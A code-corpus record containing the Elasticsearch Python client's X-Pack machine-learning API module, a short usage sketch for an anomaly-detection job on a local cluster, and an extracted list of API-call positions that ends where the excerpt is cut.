repo_name | repo_path | repo_head_hexsha | content | apis
---|---|---|---|---
imiMoisesEducation/beatcookie-discbot | build/python-env/lib/python2.7/site-packages/elasticsearch/client/xpack/ml.py | 59c8be23346d8d2fc1777a2b08856df88e2ae5c2 | from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH
class MlClient(NamespacedClient):
@query_params('from_', 'size')
def get_filters(self, filter_id=None, params=None):
"""
:arg filter_id: The ID of the filter to fetch
:arg from_: skips a number of filters
:arg size: specifies a max number of filters to get
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'filters', filter_id), params=params)
@query_params()
def get_datafeeds(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed.html>`_
:arg datafeed_id: The ID of the datafeeds to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params)
@query_params()
def get_datafeed_stats(self, datafeed_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-datafeed-stats.html>`_
:arg datafeed_id: The ID of the datafeeds stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stats'), params=params)
@query_params('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',
'from_', 'size', 'sort', 'start')
def get_buckets(self, job_id, timestamp=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-bucket.html>`_
:arg job_id: ID of the job to get bucket results from
:arg timestamp: The timestamp of the desired single bucket result
:arg body: Bucket selection details if not provided in URI
:arg anomaly_score: Filter for the most anomalous buckets
:arg desc: Set the sort direction
:arg end: End time filter for buckets
:arg exclude_interim: Exclude interim results
:arg expand: Include anomaly records
:arg from_: skips a number of buckets
:arg size: specifies a max number of buckets to get
:arg sort: Sort buckets by a particular field
:arg start: Start time filter for buckets
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'buckets', timestamp),
params=params, body=body)
@query_params('reset_end', 'reset_start')
def post_data(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-post-data.html>`_
:arg job_id: The name of the job receiving the data
:arg body: The data to process
:arg reset_end: Optional parameter to specify the end of the bucket
resetting range
:arg reset_start: Optional parameter to specify the start of the bucket
resetting range
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_data'), params=params,
body=self._bulk_body(body))
@query_params('force', 'timeout')
def stop_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-stop-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to stop
:arg force: True if the datafeed should be forcefully stopped.
:arg timeout: Controls the time to wait until a datafeed has stopped.
Defaults to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_stop'), params=params)
@query_params()
def get_jobs(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job.html>`_
:arg job_id: The ID of the jobs to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params)
@query_params()
def delete_expired_data(self, params=None):
"""
"""
return self.transport.perform_request('DELETE',
'/_xpack/ml/_delete_expired_data', params=params)
@query_params()
def put_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-job.html>`_
:arg job_id: The ID of the job to create
:arg body: The job
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id), params=params, body=body)
@query_params()
def validate_detector(self, body, params=None):
"""
:arg body: The detector
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate/detector', params=params,
body=body)
@query_params('end', 'start', 'timeout')
def start_datafeed(self, datafeed_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-start-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to start
:arg body: The start datafeed parameters
:arg end: The end time when the datafeed should stop. When not set, the
datafeed continues in real time
:arg start: The start time from where the datafeed should begin
:arg timeout: Controls the time to wait until a datafeed has started.
Defaults to 20 seconds
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_start'), params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'record_score',
'size', 'sort', 'start')
def get_records(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-record.html>`_
:arg job_id: The ID of the job to get record results from
:arg body: Record selection criteria
:arg desc: Set the sort direction
:arg end: End time filter for records
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of records
:arg record_score: Record score threshold for the requested records
:arg size: specifies a max number of records to get
:arg sort: Sort records by a particular field
:arg start: Start time filter for records
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'records'), params=params,
body=body)
@query_params()
def update_job(self, job_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-job.html>`_
:arg job_id: The ID of the job to update
:arg body: The job update settings
"""
for param in (job_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_update'), params=params, body=body)
@query_params()
def put_filter(self, filter_id, body, params=None):
"""
:arg filter_id: The ID of the filter to create
:arg body: The filter details
"""
for param in (filter_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'filters', filter_id), params=params, body=body)
@query_params()
def update_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to update
:arg body: The datafeed update settings
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_update'), params=params, body=body)
@query_params()
def preview_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-preview-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to preview
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id, '_preview'), params=params)
@query_params('advance_time', 'calc_interim', 'end', 'skip_time', 'start')
def flush_job(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-flush-job.html>`_
:arg job_id: The name of the job to flush
:arg body: Flush parameters
:arg advance_time: Advances time to the given value generating results
and updating the model for the advanced interval
:arg calc_interim: Calculates interim results for the most recent bucket
or all buckets within the latency period
:arg end: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
:arg skip_time: Skips time to the given value without generating results
or updating the model for the skipped interval
:arg start: When used in conjunction with calc_interim, specifies the
range of buckets on which to calculate interim results
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_flush'), params=params, body=body)
@query_params('force', 'timeout')
def close_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-close-job.html>`_
:arg job_id: The name of the job to close
:arg force: True if the job should be forcefully closed
:arg timeout: Controls the time to wait until a job has closed. Defaults
to 30 minutes
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_close'), params=params)
@query_params()
def open_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-open-job.html>`_
:arg job_id: The ID of the job to open
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_open'), params=params)
@query_params('force')
def delete_job(self, job_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-job.html>`_
:arg job_id: The ID of the job to delete
:arg force: True if the job should be forcefully deleted
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id), params=params)
@query_params()
def update_model_snapshot(self, job_id, snapshot_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-update-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to update
:arg body: The model snapshot properties to update
"""
for param in (job_id, snapshot_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_update'), params=params, body=body)
@query_params()
def delete_filter(self, filter_id, params=None):
"""
:arg filter_id: The ID of the filter to delete
"""
if filter_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'filter_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'filters', filter_id), params=params)
@query_params()
def validate(self, body, params=None):
"""
:arg body: The job config
"""
if body in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'body'.")
return self.transport.perform_request('POST',
'/_xpack/ml/anomaly_detectors/_validate', params=params, body=body)
@query_params('from_', 'size')
def get_categories(self, job_id, category_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-category.html>`_
:arg job_id: The name of the job
:arg category_id: The identifier of the category definition of interest
:arg body: Category selection details if not provided in URI
:arg from_: skips a number of categories
:arg size: specifies a max number of categories to get
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'categories', category_id),
params=params, body=body)
@query_params('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',
'size', 'sort', 'start')
def get_influencers(self, job_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-influencer.html>`_
:arg job_id: The ID of the job to get influencer results from
:arg body: Influencer selection criteria
:arg desc: whether the results should be sorted in descending order
:arg end: end timestamp for the requested influencers
:arg exclude_interim: Exclude interim results
:arg from_: skips a number of influencers
:arg influencer_score: influencer score threshold for the requested
influencers
:arg size: specifies a max number of influencers to get
:arg sort: sort field for the requested influencers
:arg start: start timestamp for the requested influencers
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'results', 'influencers'),
params=params, body=body)
@query_params()
def put_datafeed(self, datafeed_id, body, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-put-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to create
:arg body: The datafeed config
"""
for param in (datafeed_id, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('PUT', _make_path('_xpack', 'ml',
'datafeeds', datafeed_id), params=params, body=body)
@query_params('force')
def delete_datafeed(self, datafeed_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-datafeed.html>`_
:arg datafeed_id: The ID of the datafeed to delete
:arg force: True if the datafeed should be forcefully deleted
"""
if datafeed_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'datafeed_id'.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'datafeeds', datafeed_id), params=params)
@query_params()
def get_job_stats(self, job_id=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-job-stats.html>`_
:arg job_id: The ID of the jobs stats to fetch
"""
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, '_stats'), params=params)
@query_params('delete_intervening_results')
def revert_model_snapshot(self, job_id, snapshot_id, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-revert-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to revert to
:arg body: Reversion options
:arg delete_intervening_results: Should we reset the results back to the
time of the snapshot?
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('POST', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id,
'_revert'), params=params, body=body)
@query_params('desc', 'end', 'from_', 'size', 'sort', 'start')
def get_model_snapshots(self, job_id, snapshot_id=None, body=None, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-get-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to fetch
:arg body: Model snapshot selection criteria
:arg desc: True if the results should be sorted in descending order
:arg end: The filter 'end' query parameter
:arg from_: Skips a number of documents
:arg size: The default number of documents returned in queries as a
string.
:arg sort: Name of the field to sort on
:arg start: The filter 'start' query parameter
"""
if job_id in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'job_id'.")
return self.transport.perform_request('GET', _make_path('_xpack', 'ml',
'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params, body=body)
@query_params()
def delete_model_snapshot(self, job_id, snapshot_id, params=None):
"""
`<http://www.elastic.co/guide/en/elasticsearch/reference/current/ml-delete-snapshot.html>`_
:arg job_id: The ID of the job to fetch
:arg snapshot_id: The ID of the snapshot to delete
"""
for param in (job_id, snapshot_id):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return self.transport.perform_request('DELETE', _make_path('_xpack',
'ml', 'anomaly_detectors', job_id, 'model_snapshots', snapshot_id),
params=params)
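# ---------------------------------------------------------------------------
# Illustrative usage sketch (editorial addition, not part of the original
# module). It shows one way to drive the anomaly-detection job lifecycle with
# the methods above, assuming an X-Pack-enabled cluster on localhost and that
# this namespaced client is reachable as ``es.xpack.ml``; the job id and the
# minimal job body are hypothetical placeholders.
def _example_ml_usage():  # pragma: no cover
    from elasticsearch import Elasticsearch

    es = Elasticsearch(["localhost:9200"])
    ml = es.xpack.ml

    # Create, open and feed a simple count-based anomaly detection job.
    ml.put_job(job_id="demo-job", body={
        "analysis_config": {
            "bucket_span": "5m",
            "detectors": [{"function": "count"}],
        },
        "data_description": {"time_field": "timestamp"},
    })
    ml.open_job(job_id="demo-job")
    ml.post_data(job_id="demo-job", body=[{"timestamp": 1500000000000}])

    # Force interim results, inspect the buckets, then shut the job down.
    ml.flush_job(job_id="demo-job", body={"calc_interim": True})
    print(ml.get_buckets(job_id="demo-job"))
    ml.close_job(job_id="demo-job")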
| [((136, 165), 'elasticsearch.client.utils.query_params', 'query_params', (['"""from_"""', '"""size"""'], {}), "('from_', 'size')\n", (148, 165), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((543, 557), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (555, 557), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((940, 954), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (952, 954), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((1364, 1475), 'elasticsearch.client.utils.query_params', 'query_params', (['"""anomaly_score"""', '"""desc"""', '"""end"""', '"""exclude_interim"""', '"""expand"""', '"""from_"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('anomaly_score', 'desc', 'end', 'exclude_interim', 'expand',\n 'from_', 'size', 'sort', 'start')\n", (1376, 1475), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((2661, 2701), 'elasticsearch.client.utils.query_params', 'query_params', (['"""reset_end"""', '"""reset_start"""'], {}), "('reset_end', 'reset_start')\n", (2673, 2701), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((3533, 3565), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""', '"""timeout"""'], {}), "('force', 'timeout')\n", (3545, 3565), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4265, 4279), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4277, 4279), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4640, 4654), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4652, 4654), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4851, 4865), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (4863, 4865), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5419, 5433), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (5431, 5433), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5820, 5859), 'elasticsearch.client.utils.query_params', 'query_params', (['"""end"""', '"""start"""', '"""timeout"""'], {}), "('end', 'start', 'timeout')\n", (5832, 5859), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((6759, 6859), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""exclude_interim"""', '"""from_"""', '"""record_score"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'exclude_interim', 'from_', 'record_score',\n 'size', 'sort', 'start')\n", (6771, 6859), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((7802, 7816), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (7814, 7816), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8404, 8418), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), 
'()\n', (8416, 8418), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8898, 8912), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (8910, 8912), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9532, 9546), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (9544, 9546), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((10074, 10147), 'elasticsearch.client.utils.query_params', 'query_params', (['"""advance_time"""', '"""calc_interim"""', '"""end"""', '"""skip_time"""', '"""start"""'], {}), "('advance_time', 'calc_interim', 'end', 'skip_time', 'start')\n", (10086, 10147), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11398, 11430), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""', '"""timeout"""'], {}), "('force', 'timeout')\n", (11410, 11430), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12091, 12105), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (12103, 12105), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12590, 12611), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""'], {}), "('force')\n", (12602, 12611), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13160, 13174), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (13172, 13174), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13922, 13936), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (13934, 13936), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14335, 14349), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (14347, 14349), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((14708, 14737), 'elasticsearch.client.utils.query_params', 'query_params', (['"""from_"""', '"""size"""'], {}), "('from_', 'size')\n", (14720, 14737), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((15567, 15671), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""exclude_interim"""', '"""from_"""', '"""influencer_score"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'exclude_interim', 'from_', 'influencer_score',\n 'size', 'sort', 'start')\n", (15579, 15671), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((16782, 16796), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (16794, 16796), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17389, 17410), 'elasticsearch.client.utils.query_params', 'query_params', (['"""force"""'], {}), "('force')\n", (17401, 17410), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((17996, 18010), 'elasticsearch.client.utils.query_params', 'query_params', ([], 
{}), '()\n', (18008, 18010), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((18398, 18440), 'elasticsearch.client.utils.query_params', 'query_params', (['"""delete_intervening_results"""'], {}), "('delete_intervening_results')\n", (18410, 18440), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((19283, 19344), 'elasticsearch.client.utils.query_params', 'query_params', (['"""desc"""', '"""end"""', '"""from_"""', '"""size"""', '"""sort"""', '"""start"""'], {}), "('desc', 'end', 'from_', 'size', 'sort', 'start')\n", (19295, 19344), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((20404, 20418), 'elasticsearch.client.utils.query_params', 'query_params', ([], {}), '()\n', (20416, 20418), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((460, 508), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (470, 508), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((853, 905), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id)\n", (863, 905), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((1267, 1329), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_stats"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_stats')\n", (1277, 1329), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((2515, 2607), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""buckets"""', 'timestamp'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results',\n 'buckets', timestamp)\n", (2525, 2607), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((3394, 3458), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_data"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_data')\n", (3404, 3458), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4169, 4230), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_stop"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_stop')\n", (4179, 4230), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((4550, 4605), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (4560, 4605), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((5318, 5373), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (5328, 5373), False, 'from 
elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((6651, 6713), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_start"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_start')\n", (6661, 6713), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((7667, 7744), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""results"""', '"""records"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, 'results', 'records')\n", (7677, 7744), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8292, 8358), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_update"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_update')\n", (8302, 8358), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((8804, 8852), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""filters"""', 'filter_id'], {}), "('_xpack', 'ml', 'filters', filter_id)\n", (8814, 8852), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9423, 9486), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_update"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_update')\n", (9433, 9486), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((9975, 10039), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""datafeeds"""', 'datafeed_id', '"""_preview"""'], {}), "('_xpack', 'ml', 'datafeeds', datafeed_id, '_preview')\n", (9985, 10039), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11287, 11352), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_flush"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_flush')\n", (11297, 11352), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((11991, 12056), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_close"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_close')\n", (12001, 12056), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((12491, 12555), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id', '"""_open"""'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id, '_open')\n", (12501, 12555), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13070, 13125), 'elasticsearch.client.utils._make_path', '_make_path', (['"""_xpack"""', '"""ml"""', '"""anomaly_detectors"""', 'job_id'], {}), "('_xpack', 'ml', 'anomaly_detectors', job_id)\n", (13080, 13125), False, 'from elasticsearch.client.utils import NamespacedClient, query_params, _make_path, SKIP_IN_PATH\n'), ((13766, 13868), 'elasticsearch.client.utils._make_path', 
